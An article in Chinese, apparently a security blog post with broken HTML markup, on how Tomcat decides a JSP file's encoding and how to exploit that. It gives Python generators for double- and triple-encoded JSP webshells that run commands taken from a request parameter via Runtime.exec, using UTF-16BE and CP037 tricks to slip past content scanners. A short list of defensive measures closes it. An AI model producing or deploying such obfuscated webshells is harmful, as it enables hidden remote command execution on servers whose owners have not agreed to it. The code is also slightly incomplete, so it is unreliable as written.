JSP Webshell编码技术深度解析<\/h1>

环境与基础概念<\/h2>

测试环境<\/strong>：Tomcat 8.0.50<\/li>
JSP本质<\/strong>：JSP是Servlet技术的扩展，本质上是一种模板，通过解析后转换为Java文件并最终编译为class文件<\/li>

关键处理类<\/strong>：org.apache.jasper.compiler.ParserController#determineSyntaxAndEncoding<\/code> isXml<\/code>：判断是否为XML格式<\/li> sourceEnc<\/code>：决定JSP文件编码<\/li> <\/ul> <\/li> <\/ul> XML格式处理<\/h2> XML声明要求<\/strong>：<?xml<\/code>声明必须位于文件最前面才能正确解析encoding属性 <?xml version="1.0" encoding="utf-8" ?><\/span> <\/span><\/span><\/code><\/pre><\/li> XML格式识别<\/strong>：通过后缀名.jspx<\/code>或.tagx<\/code><\/li> 文件内容包含<xxx:root<\/code>格式的文本<\/li> <\/ol> <\/li> <\/ul> 编码识别机制<\/h2> 1. BOM(字节顺序标记)识别<\/h3> Tomcat遵循W3C定义的XML编码识别规则：<\/p> 有BOM则使用BOM定义的编码<\/li> 无BOM则查看XML encoding声明<\/li> 两者都没有则假定为UTF-8<\/li> <\/ol> 关键代码<\/strong>：org.apache.jasper.xmlparser.XMLEncodingDetector#getEncodingName<\/code><\/p> private<\/span> Object[]<\/span> getEncodingName<\/span>(<\/span>byte<\/span>[]<\/span> b4,<\/span> int<\/span> count)<\/span> {<\/span> <\/span><\/span> \/\/ 简化的BOM识别逻辑 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>b0 ==<\/span> 0xFE<\/span> &&<\/span> b1 ==<\/span> 0xFF<\/span>)<\/span> return<\/span> "UTF-16BE"<\/span>;<\/span> <\/span><\/span> if<\/span> (<\/span>b0 ==<\/span> 0xFF<\/span> &&<\/span> b1 ==<\/span> 0xFE<\/span>)<\/span> return<\/span> "UTF-16LE"<\/span>;<\/span> <\/span><\/span> if<\/span> (<\/span>b0 ==<\/span> 0xEF<\/span> &&<\/span> b1 ==<\/span> 0xBB<\/span> &&<\/span> b2 ==<\/span> 0xBF<\/span>)<\/span> return<\/span> "UTF-8"<\/span>;<\/span> <\/span><\/span> \/\/ 其他编码识别... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 通过JSP指令识别<\/h3> 当无法通过BOM识别时，Tomcat会查找JSP指令中的编码声明：<\/p> 格式一<\/strong>：<\/p> <%@ page language="java" pageEncoding="utf-16be"%> <%@ page contentType="charset=utf-16be" %> <%@ tag language="java" pageEncoding="utf-16be"%> <%@ tag contentType="charset=utf-16be" %> <\/code><\/pre> 格式二<\/strong>：<\/p> <jsp:directive.page pageEncoding="utf-16be"\/> <jsp:directive.page contentType="charset=utf-16be"\/> <jsp:directive.tag pageEncoding="utf-16be"\/> <jsp:directive.tag contentType="charset=utf-16be"\/> <\/code><\/pre> 注意<\/strong>：page<\/code>后可以不加空格，如<%@ pagepageEncoding="utf-16be" %><\/code><\/p> 双编码Webshell技术<\/h2> 基本实现原理<\/h3> 利用XML声明和内容使用不同编码的特性：<\/p> a0 =<\/span> '''<?xml version="1.0" encoding='cp037'?>'''<\/span> <\/span><\/span>a1 =<\/span> '''<jsp:root xmlns:jsp="http:\/\/java.sun.com\/JSP\/Page" version="1.2"> <\/span><\/span><\/span> <jsp:directive.page contentType="text\/html"\/> <\/span><\/span><\/span> <jsp:scriptlet> <\/span><\/span><\/span> \/\/ 恶意代码 <\/span><\/span><\/span> <\/jsp:scriptlet> <\/span><\/span><\/span><\/jsp:root>'''<\/span> <\/span><\/span> <\/span><\/span>with<\/span> open("test.jsp"<\/span>,"wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(a0.<\/span>encode("utf-16"<\/span>)) # 第一部分编码<\/span> <\/span><\/span> f.<\/span>write(a1.<\/span>encode("cp037"<\/span>)) # 第二部分编码<\/span> <\/span><\/span><\/code><\/pre>可用编码组合<\/h3> 前置编码必须是XMLEncodingDetector#getEncodingName<\/code>能识别的编码：<\/p> UTF-8<\/li> UTF-16BE<\/li> UTF-16LE<\/li> ISO-10646-UCS-4<\/li> CP037<\/li> <\/ul> 后置编码可以是Java支持的任何编码<\/p> 关键注意事项<\/h3> 长度对齐问题<\/strong>：前置部分编码后的长度必须与后置编码的字节单位对齐<\/p> 例如UTF-16是2字节编码，前置部分长度必须是偶数<\/li> 否则会导致<xxx:root<\/code>识别失败<\/li> <\/ul> <\/li> 指令位置灵活性<\/strong>：<%@<\/code>或<jsp:directive.<\/code>可以出现在文件任意位置<\/p> a0 =<\/span> '''<% Process p =Runtime.getRuntime().exec(request.getParameter("y4tacker")); String line = "'''<\/span> <\/span><\/span>a1 =<\/span> '''<%@ page pageEncoding="UTF-16BE"%>'''<\/span> <\/span><\/span>a2 =<\/span> '''"; while ((line = input.readLine()) != null) { out.write(line+"<\/span>\\<\/span>n"); }%>'''<\/span> <\/span><\/span> <\/span><\/span>with<\/span> open("test.jsp"<\/span>,"wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(a0.<\/span>encode("utf-16be"<\/span>)) <\/span><\/span> f.<\/span>write(a1.<\/span>encode("utf-8"<\/span>)) <\/span><\/span> f.<\/span>write(a2.<\/span>encode("utf-16be"<\/span>)) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 三重编码Webshell技术<\/h2> 通过组合多种编码识别机制实现更复杂的混淆：<\/p> 确保无法通过BOM识别（isBomPresent为false）<\/li> 通过<?xml encoding='xxx'<\/code>设置初始编码<\/li> 在任意位置放置<jsp:directive.<\/code>或<%@<\/code>指令<\/li> 通过指令的pageEncoding属性再次改变编码<\/li> <\/ol> 示例<\/strong>：<\/p> a0 =<\/span> '''<?xml version="1.0" encoding='cp037'?>'''<\/span> <\/span><\/span>a1 =<\/span> '''<% Process p =Runtime.getRuntime().exec(request.getParameter("y4tacker")); String line = "'''<\/span> <\/span><\/span>a2 =<\/span> '''<%@ page pageEncoding="UTF-16BE"%>'''<\/span> <\/span><\/span>a3 =<\/span> '''"; while ((line = input.readLine()) != null) { out.write(line+"<\/span>\\<\/span>n"); }%>'''<\/span> <\/span><\/span> <\/span><\/span>with<\/span> open("test3.jsp"<\/span>,"wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(a0.<\/span>encode("utf-8"<\/span>)) <\/span><\/span> f.<\/span>write(a1.<\/span>encode("utf-16be"<\/span>)) <\/span><\/span> f.<\/span>write(a2.<\/span>encode("cp037"<\/span>)) <\/span><\/span> f.<\/span>write(a3.<\/span>encode("utf-16be"<\/span>)) <\/span><\/span><\/code><\/pre>其他技术细节<\/h2> 空格处理差异<\/strong>：<\/p> XML头解析使用XMLChar#isSpace<\/code>：识别\x0d<\/code>、\x0a9<\/code>、\x0a<\/code>、\x0d<\/code><\/li> JSP指令解析使用JspReader#isSpace<\/code>：识别所有小于\x20<\/code>的字符<\/li> <\/ul> <\/li> 版本差异<\/strong>：不同Tomcat版本在编码处理上可能有细微差别，需针对性测试<\/p> <\/li> <\/ul> 防御建议<\/h2> 禁用JSP上传功能<\/li> 对上传文件进行内容检查<\/li> 使用安全产品检测双编码\/多编码文件<\/li> 限制Tomcat的解析能力，如禁用XML格式JSP解析<\/li> <\/ol>